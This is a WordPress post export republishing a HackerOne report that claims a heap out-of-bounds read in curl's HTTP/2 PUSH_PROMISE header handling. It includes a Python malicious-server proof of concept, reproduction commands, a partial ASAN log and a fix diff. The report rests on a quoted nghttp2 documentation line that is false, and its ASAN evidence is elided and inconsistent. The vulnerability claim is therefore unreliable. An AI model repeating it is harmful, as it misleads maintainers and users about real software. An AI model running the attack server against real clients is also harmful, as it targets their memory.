{"id":35052,"date":"2026-01-10T16:38:51","date_gmt":"2026-01-10T16:38:51","guid":{"rendered":"http:\/\/localhost\/?p=35052"},"modified":"2026-01-10T16:38:51","modified_gmt":"2026-01-10T16:38:51","slug":"curl-heap-out-of-bounds-read-in-libhttp2c-via-malformed-pushpromise-headers","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=35052","title":{"rendered":"curl: Heap Out-of-Bounds Read in lib\/http2.c via Malformed PUSH_PROMISE Headers_H1:3506159"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-10T22:25:46&#8243;,&#8221;description&#8221;:&#8221;Summary\\nA heap-based out-of-bounds read vulnerability exists in libcurl&#8217;s HTTP\/2 implementation. The on_header callback in lib\/http2.c incorrectly treats header names and values provided by nghttp2 as null-terminated C-strings. Specifically, passing these pointers to curl_maprintf with the %s format specifier triggers an out-of-bounds read via strlen(), as nghttp2 provides raw byte buffers with explicit lengths, not null-terminated strings.\\n+1\\n\\nVulnerability Analysis \\u0026 Root Cause\\n1. API Contract Violation: According to the nghttp2 documentation, the nghttp2_on_header_callback provides pointers to the header name and value (name, value) alongside their lengths (namelen, valuelen). The documentation explicitly states:\\n\\n\\&#8221;The &#8216;name&#8217; and &#8216;value&#8217; pointers are NOT guaranteed to be null-terminated. [&#8230;] Applications MUST use the provided length parameters.\\&#8221;.\\n\\n2. Vulnerable Implementation: In lib\/http2.c, the on_header function ignores the length parameters when formatting the string for PUSH_PROMISE headers, relying on curl_maprintf which internally uses strlen:\\n\\nC\\n\\n\/* lib\/http2.c around line 1642 &#8211; Vulnerable *\/\\nh = curl_maprintf(\\&#8221;%s:%s\\&#8221;, name, value); \\n3. Execution Flow:\\n\\ncurl_maprintf parses the %s format specifier.\\n\\nIt internally calls strlen() on the name and value pointers.\\n\\nSince the malicious server sends a header without a null byte, strlen() reads past the allocated buffer boundary until it hits a coincidental null byte in adjacent heap memory.\\n\\nThis results in an Out-of-Bounds Read.\\n\\nSteps to Reproduce\\n1. Build Environment\\nCompile cURL with AddressSanitizer (ASAN) to visualize the memory violation:\\n\\nBash\\n\\n.\/configure &#8211;with-nghttp2 &#8211;enable-debug CFLAGS=\\&#8221;-fsanitize=address -g\\&#8221; LDFLAGS=\\&#8221;-fsanitize=address\\&#8221;\\nmake -j$(nproc)\\n2. Reproduction Script (http2_server.py)\\nThis Python script (using h2) establishes an HTTP\/2 connection and pushes a stream with a non-null-terminated header.\\n\\nPython\\n\\nimport asyncio, h2.connection, h2.events, h2.config\\n\\nasync def handle(reader, writer):\\n    config = h2.config.H2Configuration(client_side=False)\\n    conn = h2.connection.H2Connection(config=config)\\n    conn.initiate_connection()\\n    conn.update_settings({h2.settings.SettingCodes.ENABLE_PUSH: 1})\\n    writer.write(conn.data_to_send())\\n    await writer.drain()\\n\\n    data = await reader.read(65535)\\n    events = conn.receive_data(data)\\n    \\n    for event in events:\\n        if isinstance(event, h2.events.RequestReceived):\\n            conn.send_headers(event.stream_id, [(&#8216;:status&#8217;, &#8216;200&#8217;)])\\n            \\n            # MALICIOUS PAYLOAD: Header with no null termination logic\\n            malicious_name = b&#8217;x-oob-test&#8217; + b&#8217;A&#8217; * 64 \\n            malicious_val = b&#8217;trigger&#8217; + b&#8217;B&#8217; * 64\\n            \\n            conn.push_stream(event.stream_id, event.stream_id + 2, [\\n                (b&#8217;:method&#8217;, b&#8217;GET&#8217;), (b&#8217;:path&#8217;, b&#8217;\/push&#8217;),\\n                (b&#8217;:scheme&#8217;, b&#8217;http&#8217;), (b&#8217;:authority&#8217;, b&#8217;localhost&#8217;),\\n                (malicious_name, malicious_val)\\n            ])\\n            writer.write(conn.data_to_send())\\n            await writer.drain()\\n            break\\n    writer.close()\\n\\nasyncio.run(asyncio.start_server(handle, &#8216;127.0.0.1&#8217;, 8080).serve_forever())\\n3. Execution\\nRun the server and connect with the ASAN-enabled cURL:\\n\\nBash\\n\\n# Terminal 1\\npython3 http2_server.py\\n\\n# Terminal 2\\nASAN_OPTIONS=detect_stack_use_after_return=1 .\/src\/curl -v &#8211;http2-prior-knowledge http:\/\/127.0.0.1:8080\/\\nEvidence (ASAN Log)\\nThe following ASAN output confirms the read overflow. The READ of size&#8230; occurs inside strlen called by curl_maprintf.\\n\\nPlaintext\\n\\n==67356==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6c352e0e001a&#8230;\\nREAD of size 11 at 0x6c352e0e001a thread T0\\n    #0 0x&#8230; in strlen\\n    #1 0x&#8230; in curl_maprintf\\n    #2 0x&#8230; in on_header lib\/http2.c:1642\\n&#8230;\\n0x6c352e0e001a is located 0 bytes after 10-byte region&#8230;\\nRecommended Fix\\nThe code must use the explicit namelen and valuelen parameters provided by the nghttp2 callback to limit the read operation.\\n\\nPatch (lib\/http2.c): Use the precision specifier %.*s which takes the length as an integer argument before the string pointer.\\n\\nC\\n\\n\/* Fixed implementation *\/\\nh = curl_maprintf(\\&#8221;%.*s:%.*s\\&#8221;, (int)namelen, name, (int)valuelen, value);\\nDiff:\\n\\nDiff\\n\\n&#8212; a\/lib\/http2.c\\n+++ b\/lib\/http2.c\\n@@ -1642,7 +1642,7 @@ static int on_header(nghttp2_session *session, const nghttp2_frame *frame,\\n-      h = curl_maprintf(\\&#8221;%s:%s\\&#8221;, name, value);\\n+      h = curl_maprintf(\\&#8221;%.*s:%.*s\\&#8221;, (int)namelen, name, (int)valuelen, value);\\n\\n## Impact\\n\\nImpact\\nInformation Disclosure: Attackers can read sensitive data (keys, tokens, other request data) from the heap memory adjacent to the header buffer.\\n\\nAvailability: If the OOB read accesses unmapped memory, the application will crash.&#8221;,&#8221;published&#8221;:&#8221;2026-01-10T19:22:26&#8243;,&#8221;modified&#8221;:&#8221;2026-01-10T21:57:49&#8243;,&#8221;type&#8221;:&#8221;hackerone&#8221;,&#8221;title&#8221;:&#8221;curl: Heap Out-of-Bounds Read in lib\/http2.c via Malformed PUSH_PROMISE Headers&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;H1:3506159&#8243;,&#8221;bulletinFamily&#8221;:&#8221;bugbounty&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;&#8221;,&#8221;sourceHref&#8221;:&#8221;&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/hackerone.com\/reports\/3506159&#8243;,&#8221;category_name&#8221;:&#8221;News&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-10T22:25:46&#8243;,&#8221;description&#8221;:&#8221;Summary\\nA heap-based out-of-bounds read vulnerability exists in libcurl&#8217;s HTTP\/2 implementation. The on_header callback in lib\/http2.c incorrectly treats header names and values provided by nghttp2 as&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-35052","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>curl: Heap Out-of-Bounds Read in lib\/http2.c via Malformed PUSH_PROMISE Headers_H1:3506159 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=35052\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"curl: Heap Out-of-Bounds Read in lib\/http2.c via Malformed PUSH_PROMISE Headers_H1:3506159 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-01-10T22:25:46&#8243;,&#8221;description&#8221;:&#8221;SummarynA heap-based out-of-bounds read vulnerability exists in libcurl&#8217;s HTTP\/2 implementation. The on_header callback in lib\/http2.c incorrectly treats header names and values provided by nghttp2 as...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=35052\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-10T16:38:51+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35052#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35052\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"curl: Heap Out-of-Bounds Read in lib\\\/http2.c via Malformed PUSH_PROMISE Headers_H1:3506159\",\"datePublished\":\"2026-01-10T16:38:51+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35052\"},\"wordCount\":837,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"hackerone\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_news\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=35052#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35052\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35052\",\"name\":\"curl: Heap Out-of-Bounds Read in lib\\\/http2.c via Malformed PUSH_PROMISE Headers_H1:3506159 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-10T16:38:51+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35052#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=35052\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35052#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"curl: Heap Out-of-Bounds Read in lib\\\/http2.c via Malformed PUSH_PROMISE Headers_H1:3506159\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"curl: Heap Out-of-Bounds Read in lib\/http2.c via Malformed PUSH_PROMISE Headers_H1:3506159 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=35052","og_locale":"en_US","og_type":"article","og_title":"curl: Heap Out-of-Bounds Read in lib\/http2.c via Malformed PUSH_PROMISE Headers_H1:3506159 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-01-10T22:25:46&#8243;,&#8221;description&#8221;:&#8221;SummarynA heap-based out-of-bounds read vulnerability exists in libcurl&#8217;s HTTP\/2 implementation. The on_header callback in lib\/http2.c incorrectly treats header names and values provided by nghttp2 as...","og_url":"https:\/\/zero.redgem.net\/?p=35052","og_site_name":"zero redgem","article_published_time":"2026-01-10T16:38:51+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=35052#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=35052"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"curl: Heap Out-of-Bounds Read in lib\/http2.c via Malformed PUSH_PROMISE Headers_H1:3506159","datePublished":"2026-01-10T16:38:51+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=35052"},"wordCount":837,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","hackerone","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_news"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=35052#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=35052","url":"https:\/\/zero.redgem.net\/?p=35052","name":"curl: Heap Out-of-Bounds Read in lib\/http2.c via Malformed PUSH_PROMISE Headers_H1:3506159 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-10T16:38:51+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=35052#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=35052"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=35052#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"curl: Heap Out-of-Bounds Read in lib\/http2.c via Malformed PUSH_PROMISE Headers_H1:3506159"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/35052","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=35052"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/35052\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=35052"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=35052"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=35052"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}